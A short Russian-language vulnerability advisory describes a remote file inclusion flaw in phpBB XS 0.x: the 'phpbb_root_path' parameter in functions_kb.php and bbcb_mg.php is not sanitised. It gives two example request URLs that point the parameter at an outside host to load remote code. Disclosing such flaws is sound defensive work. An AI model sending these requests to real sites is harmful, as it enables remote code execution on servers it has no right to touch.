Программа: phpBB XS 0.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в обработке данных, вводимых через параметр «phpbb_root_path» сценариями functions_kb.php и bbcb_mg.php.

Примеры:

http://www.example.com/[path]/includes/functions_kb.php? phpbb_root_path=http://www.example.com
http://www.example.com/[path]/includes/bbcb_mg.php? phpbb_root_path=http://www.example.com

Оставить мнение